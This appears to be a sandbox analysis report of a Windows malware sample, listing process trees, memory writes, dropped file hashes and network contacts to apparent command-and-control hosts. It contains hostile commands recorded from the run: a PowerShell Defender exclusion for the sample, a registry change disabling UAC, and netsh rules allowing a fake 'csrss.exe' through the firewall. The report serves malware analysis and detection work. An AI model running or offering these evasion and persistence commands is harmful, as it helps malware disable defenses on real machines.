PID 2240 wrote to memory of 2924 N/A C:\Users\Admin\Pictures\2oyXsl7pvbVirJgqH7QUtCPr.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 244 wrote to memory of 228 N/A C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 244 wrote to memory of 228 N/A C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 244 wrote to memory of 228 N/A C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3936 wrote to memory of 3652 N/A C:\Users\Admin\Pictures\ccoo5BlZcHqJPIQURYx78bxz.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3936 wrote to memory of 3652 N/A C:\Users\Admin\Pictures\ccoo5BlZcHqJPIQURYx78bxz.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3936 wrote to memory of 3652 N/A C:\Users\Admin\Pictures\ccoo5BlZcHqJPIQURYx78bxz.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3172 wrote to memory of 392 N/A C:\Users\Admin\Pictures\zEPbmh410knZcspyfGDS7ORv.exe C:\Users\Admin\AppData\Local\Temp\u2g4.0.exe
PID 3172 wrote to memory of 392 N/A C:\Users\Admin\Pictures\zEPbmh410knZcspyfGDS7ORv.exe C:\Users\Admin\AppData\Local\Temp\u2g4.0.exe
PID 3172 wrote to memory of 392 N/A C:\Users\Admin\Pictures\zEPbmh410knZcspyfGDS7ORv.exe C:\Users\Admin\AppData\Local\Temp\u2g4.0.exe
PID 3172 wrote to memory of 3012 N/A C:\Users\Admin\Pictures\zEPbmh410knZcspyfGDS7ORv.exe C:\Users\Admin\AppData\Local\Temp\u2g4.1.exe
PID 3172 wrote to memory of 3012 N/A C:\Users\Admin\Pictures\zEPbmh410knZcspyfGDS7ORv.exe C:\Users\Admin\AppData\Local\Temp\u2g4.1.exe
PID 3172 wrote to memory of 3012 N/A C:\Users\Admin\Pictures\zEPbmh410knZcspyfGDS7ORv.exe C:\Users\Admin\AppData\Local\Temp\u2g4.1.exe
PID 1224 wrote to memory of 1428 N/A C:\Users\Admin\Pictures\9vbvS6oLRF12GScdDI45jaXw.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1224 wrote to memory of 1428 N/A C:\Users\Admin\Pictures\9vbvS6oLRF12GScdDI45jaXw.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1224 wrote to memory of 1428 N/A C:\Users\Admin\Pictures\9vbvS6oLRF12GScdDI45jaXw.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Temp\u2g4.1.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 3012 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Temp\u2g4.1.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 5044 wrote to memory of 3864 N/A C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5044 wrote to memory of 3864 N/A C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5044 wrote to memory of 3864 N/A C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 788 wrote to memory of 2992 N/A C:\Users\Admin\Pictures\2oyXsl7pvbVirJgqH7QUtCPr.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 788 wrote to memory of 2992 N/A C:\Users\Admin\Pictures\2oyXsl7pvbVirJgqH7QUtCPr.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 788 wrote to memory of 2992 N/A C:\Users\Admin\Pictures\2oyXsl7pvbVirJgqH7QUtCPr.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe

"C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"

C:\Users\Admin\Pictures\zEPbmh410knZcspyfGDS7ORv.exe

"C:\Users\Admin\Pictures\zEPbmh410knZcspyfGDS7ORv.exe"

C:\Users\Admin\Pictures\2oyXsl7pvbVirJgqH7QUtCPr.exe

"C:\Users\Admin\Pictures\2oyXsl7pvbVirJgqH7QUtCPr.exe"

C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe

"C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe"

C:\Users\Admin\Pictures\9vbvS6oLRF12GScdDI45jaXw.exe

"C:\Users\Admin\Pictures\9vbvS6oLRF12GScdDI45jaXw.exe"

C:\Users\Admin\Pictures\ccoo5BlZcHqJPIQURYx78bxz.exe

"C:\Users\Admin\Pictures\ccoo5BlZcHqJPIQURYx78bxz.exe"

C:\Users\Admin\Pictures\ub3dpREG7Tcuj2uRy2diwUGo.exe

"C:\Users\Admin\Pictures\ub3dpREG7Tcuj2uRy2diwUGo.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Users\Admin\Pictures\hFyK7KqQVxnK605yowtvP7UA.exe

"C:\Users\Admin\Pictures\hFyK7KqQVxnK605yowtvP7UA.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\u2g4.0.exe

"C:\Users\Admin\AppData\Local\Temp\u2g4.0.exe"

C:\Users\Admin\AppData\Local\Temp\u2g4.1.exe

"C:\Users\Admin\AppData\Local\Temp\u2g4.1.exe"

C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe

"C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe"

C:\Users\Admin\Pictures\2oyXsl7pvbVirJgqH7QUtCPr.exe

"C:\Users\Admin\Pictures\2oyXsl7pvbVirJgqH7QUtCPr.exe"

C:\Users\Admin\Pictures\ccoo5BlZcHqJPIQURYx78bxz.exe

"C:\Users\Admin\Pictures\ccoo5BlZcHqJPIQURYx78bxz.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\Pictures\9vbvS6oLRF12GScdDI45jaXw.exe

"C:\Users\Admin\Pictures\9vbvS6oLRF12GScdDI45jaXw.exe"

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4240 -ip 4240

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4240 -s 356

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 392 -ip 392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 392 -s 2008

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

Network

Country Destination Domain Proto
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 58.99.105.20.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 yip.su udp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.169.89:443 yip.su tcp
US 8.8.8.8:53 realdeepai.org udp
RU 5.42.96.64:80 5.42.96.64 tcp
RU 193.233.132.234:80 tcp
DE 185.172.128.59:80 185.172.128.59 tcp
US 8.8.8.8:53 avgmc.xyz udp
US 8.8.8.8:53 onlycitylink.com udp
RU 193.233.132.234:80 tcp
US 104.21.90.14:443 realdeepai.org tcp
US 104.21.90.14:443 realdeepai.org tcp
US 104.21.18.166:443 onlycitylink.com tcp
US 104.21.18.166:443 onlycitylink.com tcp
RU 84.38.181.36:443 avgmc.xyz tcp
US 8.8.8.8:53 jonathantwo.com udp
US 8.8.8.8:53 firstfirecar.com udp
US 172.67.176.131:443 jonathantwo.com tcp
US 172.67.176.131:443 jonathantwo.com tcp
US 172.67.193.220:443 firstfirecar.com tcp
US 172.67.193.220:443 firstfirecar.com tcp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
US 8.8.8.8:53 89.169.67.172.in-addr.arpa udp
US 8.8.8.8:53 59.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 14.90.21.104.in-addr.arpa udp
US 8.8.8.8:53 64.96.42.5.in-addr.arpa udp
US 8.8.8.8:53 36.181.38.84.in-addr.arpa udp
US 8.8.8.8:53 166.18.21.104.in-addr.arpa udp
US 8.8.8.8:53 131.176.67.172.in-addr.arpa udp
US 8.8.8.8:53 220.193.67.172.in-addr.arpa udp
RU 5.42.66.10:80 5.42.66.10 tcp
US 8.8.8.8:53 api.myip.com udp
US 172.67.75.163:443 api.myip.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 10.66.42.5.in-addr.arpa udp
US 8.8.8.8:53 163.75.67.172.in-addr.arpa udp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
DE 185.172.128.90:80 185.172.128.90 tcp
DE 185.172.128.228:80 185.172.128.228 tcp
DE 185.172.128.59:80 185.172.128.59 tcp
US 8.8.8.8:53 90.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 228.128.172.185.in-addr.arpa udp
DE 185.172.128.228:80 185.172.128.228 tcp
US 8.8.8.8:53 svc.iolo.com udp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 45.87.157.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 download.iolo.net udp
FR 143.244.56.49:443 download.iolo.net tcp
US 8.8.8.8:53 49.56.244.143.in-addr.arpa udp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 148.155.9.20.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
DE 185.172.128.150:80 185.172.128.150 tcp
US 8.8.8.8:53 150.128.172.185.in-addr.arpa udp

Files

memory/716-0-0x00007FFCC05B3000-0x00007FFCC05B5000-memory.dmp

memory/716-1-0x000001F0A75A0000-0x000001F0A75AA000-memory.dmp

memory/716-2-0x000001F0C19C0000-0x000001F0C1A1E000-memory.dmp

memory/716-3-0x00007FFCC05B0000-0x00007FFCC1071000-memory.dmp

memory/4332-4-0x0000000000400000-0x0000000000408000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kjmbdxdt.onr.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3436-5-0x000001F4B48D0000-0x000001F4B48F2000-memory.dmp

memory/3436-15-0x00007FFCC05B0000-0x00007FFCC1071000-memory.dmp

memory/3436-16-0x00007FFCC05B0000-0x00007FFCC1071000-memory.dmp

memory/3436-17-0x00007FFCC05B0000-0x00007FFCC1071000-memory.dmp

memory/3436-20-0x00007FFCC05B0000-0x00007FFCC1071000-memory.dmp

memory/716-21-0x00007FFCC05B0000-0x00007FFCC1071000-memory.dmp

C:\Users\Admin\Pictures\Ck5ne28mgyQKG6rKTaldVLnh.exe

MD5 77f762f953163d7639dff697104e1470
SHA1 ade9fff9ffc2d587d50c636c28e4cd8dd99548d3
SHA256 d9e15bb8027ff52d6d8d4e294c0d690f4bbf9ef3abc6001f69dcf08896fbd4ea
SHA512 d9041d02aaca5f06a0f82111486df1d58df3be7f42778c127ccc53b2e1804c57b42b263cc607d70e5240518280c7078e066c07dec2ea32ec13fb86aa0d4cb499

C:\Users\Admin\Pictures\zEPbmh410knZcspyfGDS7ORv.exe

MD5 8ff1083b2490429a4ea0ecf8f5542c8c
SHA1 70ebf9b87666aab4db253e98e845ea440602a4cc
SHA256 e43535ac108378521826695ae572ea24b4cde1a78b0016d3b5ebe82ff5934535
SHA512 c2f4d386f0b46ed9ed0716e3df086afb3ed360ea3afb74cb3dc0369311088332ae037269575722d5f60a12be9a242f505d32440ed294ad5170ec315c588b3c5c

C:\Users\Admin\Pictures\2oyXsl7pvbVirJgqH7QUtCPr.exe

MD5 34e8369309638e9468c65df8d546e9ec
SHA1 f6296bdb66b9f188a9093d0f2e3edaf3dfd5ed9f
SHA256 bc09d4cc90b0e7b582c6ed7010277377aff00042d7469cb2e9f11f775cef4605
SHA512 b792981f6e855fcab23dbb078f5aa2398c6c4175b4b151a656174b756de936bc388d2fa2c8432a9b9120256e5db9ebbfca38a12d60bc085f744988ef1a726c48

C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe

MD5 b4edadf4b8fc4c176cef6830ab7d3177
SHA1 6f93a98295f5b4a514870db5c50d000f3d644264
SHA256 241ec7b24544cef6c5762622c25c91621f0dd20c9154dcf20c83932d2c3496e5
SHA512 dc727e1cbe252fdfbc866ac4dad3d256038535b32d437d8d17e537c8723b1b8f51da6e0de4a7ac53295cf091fcf93591907f1bd2487618c542bc96e8616232dc

C:\Users\Admin\Pictures\ub3dpREG7Tcuj2uRy2diwUGo.exe

MD5 d41fd1ea6e0ca0032be2174317f60fd8
SHA1 60f001b9d201259aa333e9b202e4ab5648d16bf3
SHA256 3c56d175e67df7e1664bbedd95abee57cf93a7aceaf80374ede4ce1fc4a30990
SHA512 a4ce799f1ce9157d053dcb1694dcb127d98e994eb55cecb484ace1c192cf80a1fbfb7b8de94851a49e915cafebc568f70ce07b912e5901387ed90639c692c16e

memory/1140-115-0x0000000140000000-0x000000014097B000-memory.dmp

C:\Users\Admin\Pictures\hFyK7KqQVxnK605yowtvP7UA.exe

MD5 6b605b6ca55b36b604074259dc4900cd
SHA1 34c783dd19894549b7c5acc4510e273833ed7e87
SHA256 e87f2fecb67fc73a90a1970615f0001bd762af53782ca23f4ab7f99e8c5164d0
SHA512 ed9ae702d705d7129da7f424fbd0f42b74938041dd30f7d3c6f0b976cb1e42afe14029306c21b35f32293f9354902119b491e2acc4abed2a2a3dd668d82d4f3c

memory/1140-137-0x0000000140000000-0x000000014097B000-memory.dmp

memory/2924-141-0x0000000002790000-0x00000000027C6000-memory.dmp

memory/228-142-0x00000000056D0000-0x0000000005CF8000-memory.dmp

memory/228-143-0x00000000053E0000-0x0000000005402000-memory.dmp

memory/228-144-0x0000000005580000-0x00000000055E6000-memory.dmp

memory/228-145-0x0000000005E70000-0x0000000005ED6000-memory.dmp

memory/228-164-0x0000000005EE0000-0x0000000006234000-memory.dmp

memory/228-166-0x00000000064B0000-0x00000000064CE000-memory.dmp

memory/228-167-0x0000000006A90000-0x0000000006ADC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\u2g4.0.exe

MD5 a33065159222d4c22e581ea419285701
SHA1 6297d390c9d8c3b8c3340d8d38d46c1bbf32d354
SHA256 ddf2f47cbc0db66b326be096b46854a6ab59a2504688077bba0bbb42c4470ae2
SHA512 2860dab79524b7db3f0b7771b8d402905a8096653d1c83e49e3827bb7cd739104848b691be16fbd898b81bfd4fcdd827fc4c8f72da6e91d565f02e59f5725f79

memory/228-179-0x0000000007680000-0x00000000076C4000-memory.dmp

memory/228-189-0x00000000077D0000-0x0000000007846000-memory.dmp

memory/228-190-0x0000000007ED0000-0x000000000854A000-memory.dmp

memory/228-191-0x0000000007870000-0x000000000788A000-memory.dmp

memory/228-193-0x0000000070380000-0x00000000703CC000-memory.dmp

memory/228-194-0x000000006FFF0000-0x0000000070344000-memory.dmp

memory/228-192-0x0000000007A10000-0x0000000007A42000-memory.dmp

memory/228-205-0x0000000007A70000-0x0000000007B13000-memory.dmp

memory/2924-206-0x0000000070380000-0x00000000703CC000-memory.dmp

memory/2924-207-0x000000006FFF0000-0x0000000070344000-memory.dmp

memory/228-204-0x0000000007A50000-0x0000000007A6E000-memory.dmp

memory/2924-217-0x00000000074D0000-0x00000000074DA000-memory.dmp

memory/2924-218-0x0000000007590000-0x0000000007626000-memory.dmp

memory/2924-219-0x00000000074F0000-0x0000000007501000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\u2g4.1.exe

MD5 397926927bca55be4a77839b1c44de6e
SHA1 e10f3434ef3021c399dbba047832f02b3c898dbd
SHA256 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7
SHA512 cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

memory/3652-234-0x0000000070380000-0x00000000703CC000-memory.dmp

memory/3652-235-0x000000006FFF0000-0x0000000070344000-memory.dmp

memory/228-246-0x0000000007BD0000-0x0000000007BDE000-memory.dmp

memory/228-247-0x0000000007BE0000-0x0000000007BF4000-memory.dmp

memory/228-248-0x0000000007CD0000-0x0000000007CEA000-memory.dmp

memory/228-249-0x0000000007C10000-0x0000000007C18000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 a6ea7bfcd3aac150c0caef765cb52281
SHA1 037dc22c46a0eb0b9ad4c74088129e387cffe96b
SHA256 f019af2e5e74cdf13c963910500f9436c66b6f2901f5056d72f82310f20113b9
SHA512 c8d2d373b48a26cf6eec1f5cfc05819011a3fc49d863820ad07b6442dd6d5f64e27022a9e4c381eb58bf7f6b19f8e77d508734ff803073ec2fb32da9081b6f23

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 46a4f71e5629582262e5f05e655db5c9
SHA1 4879a9089582e792416a3acec38873ac7051b6da
SHA256 673d9ce3dc01edcae12b4086ae15d6bfe0387248fc2dc02ce8faff4c20a666d6
SHA512 70a54fe357627c1342dcee851e37cebe3c8af94c858391a22db212da66801ba0b4627c7edc0a9d3bed66bd16440afe0adb0a0f3e9b426bd0e7bd16719f50c6fc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 c68f749c595bf5c0ad71f7604c7b0cdb
SHA1 18dd0f6de70826f5c49c82792bb8ac9b28fb6f32
SHA256 60751e4bed7352036d20ecc7938098fec4775822de4033211b2aa452cadd5a43
SHA512 fd2880d78e8b905310d2ba8075ba791fd31b0443221664a760d95a5ef8b83f0b75f06091e535313ce3f306bb9ac4bfd2d676ccda5530e0d15164b3df7a2bdd74

memory/1428-276-0x00000000057D0000-0x0000000005B24000-memory.dmp

memory/3172-278-0x0000000000400000-0x0000000002B1E000-memory.dmp

memory/2240-279-0x0000000000400000-0x0000000002ED5000-memory.dmp

memory/244-280-0x0000000000400000-0x0000000002ED5000-memory.dmp

memory/3936-282-0x0000000000400000-0x0000000002ED5000-memory.dmp

memory/1224-281-0x0000000000400000-0x0000000002ED5000-memory.dmp

memory/1428-285-0x000000006FEA0000-0x00000000701F4000-memory.dmp

memory/1428-284-0x0000000070380000-0x00000000703CC000-memory.dmp

memory/1224-298-0x0000000000400000-0x0000000002ED5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 a4db32123183147315cead49e5dc7e50
SHA1 82ec33edbfe8991f3bff76015f18122cbb2a8dbe
SHA256 01f95fb835e593bb0ba455e11495b38879b0cf5425357386986aa8351373995e
SHA512 4106a2551ed5268867110e6ecc2b32f7ca21ea5463c7954fc2ffcdfd915702f310534975c77dcf7c5d09817d07fb1c8ac7cf1db9ec82968df9051b8d09383e59

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 0e4cb70ab5a08154c9b41f1d2a9f47ed
SHA1 3dabc6decfd17b43882a309f0282406319dfae14
SHA256 7fd93184220879869ac10380d0d0bd8892586491cae5c94957651e9dde0e3d0a
SHA512 3f77f89d65acf37081dcf1c8c31f0c65851456233bbfe613aa35feccfa36179b4375686f25ad27804e5ec78e9a062e9b48e7cbc6c9c3c7df25bcf8ae96c82684

memory/3012-330-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/4520-332-0x000002735F9E0000-0x0000027363214000-memory.dmp

memory/4520-336-0x0000027365050000-0x0000027365064000-memory.dmp

memory/4520-337-0x000002737D9A0000-0x000002737D9C4000-memory.dmp

memory/4520-335-0x0000027365060000-0x000002736506C000-memory.dmp

memory/4520-334-0x0000027363640000-0x0000027363650000-memory.dmp

memory/4520-333-0x000002737DBF0000-0x000002737DCFA000-memory.dmp

memory/4520-339-0x0000027365030000-0x000002736503A000-memory.dmp

memory/4520-340-0x000002737DB10000-0x000002737DBC2000-memory.dmp

memory/4520-342-0x000002737DEC0000-0x000002737DF10000-memory.dmp

memory/4520-341-0x000002737DE40000-0x000002737DE6A000-memory.dmp

memory/4520-343-0x0000027365040000-0x000002736504A000-memory.dmp

memory/4520-347-0x000002737DF10000-0x000002737E210000-memory.dmp

memory/4520-349-0x000002737FB60000-0x000002737FB68000-memory.dmp

memory/4520-352-0x000002737FB80000-0x000002737FB88000-memory.dmp

memory/4520-351-0x000002737FB70000-0x000002737FB7E000-memory.dmp

memory/4520-350-0x000002737FE50000-0x000002737FE88000-memory.dmp

memory/4520-355-0x0000027303600000-0x0000027303622000-memory.dmp

memory/4520-354-0x00000273035A0000-0x0000027303602000-memory.dmp

memory/4520-353-0x0000027303580000-0x000002730358A000-memory.dmp

memory/4520-356-0x0000027303B50000-0x0000027304078000-memory.dmp

memory/4520-359-0x0000027303300000-0x000002730330C000-memory.dmp

memory/4520-360-0x000002737FF10000-0x000002737FF86000-memory.dmp

memory/4520-361-0x000002737E230000-0x000002737E24E000-memory.dmp

memory/4520-368-0x0000027363660000-0x00000273636FA000-memory.dmp

memory/4240-369-0x0000000000400000-0x0000000002AF2000-memory.dmp

memory/3864-410-0x0000000005950000-0x0000000005CA4000-memory.dmp

memory/3864-411-0x0000000006320000-0x000000000636C000-memory.dmp

memory/392-412-0x0000000061E00000-0x0000000061EF3000-memory.dmp

memory/3864-451-0x000000006F8E0000-0x000000006F92C000-memory.dmp

memory/3864-462-0x0000000006DC0000-0x0000000006E63000-memory.dmp

memory/3864-452-0x000000006F930000-0x000000006FC84000-memory.dmp

memory/3864-475-0x00000000072A0000-0x00000000072B1000-memory.dmp

C:\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

C:\ProgramData\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

memory/3864-495-0x00000000072F0000-0x0000000007304000-memory.dmp

C:\ProgramData\Are.docx

MD5 a33e5b189842c5867f46566bdbf7a095
SHA1 e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA256 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512 f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

memory/2992-515-0x000000006F8E0000-0x000000006F92C000-memory.dmp

memory/2992-516-0x000000006F930000-0x000000006FC84000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 62413e2f215769b4ac2949e5199f26ab
SHA1 a9a2fce39fae107a0024433c180b60e6626e0f17
SHA256 be425c1030f2a70de4f59b8481e292110a73e7326640b0a69bc47e86a75e3983
SHA512 4ecbe548db9fd63bde2771ec6b72ec3d8455e661763666611921764590eb5d02c910cac98df1554600620178f235302e438cbcdf01bf6bcf8b7e4088fc3ce6f5

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 3d086a433708053f9bf9523e1d87a4e8
SHA1 b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA256 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

memory/1120-537-0x0000000006250000-0x00000000065A4000-memory.dmp

memory/1120-543-0x0000000006EC0000-0x0000000006F0C000-memory.dmp

memory/1120-554-0x000000006FED0000-0x000000006FF1C000-memory.dmp

memory/1120-555-0x0000000070070000-0x00000000703C4000-memory.dmp

memory/1120-565-0x0000000007B90000-0x0000000007C33000-memory.dmp

memory/1120-566-0x0000000006700000-0x0000000006711000-memory.dmp

memory/864-567-0x000000006FED0000-0x000000006FF1C000-memory.dmp

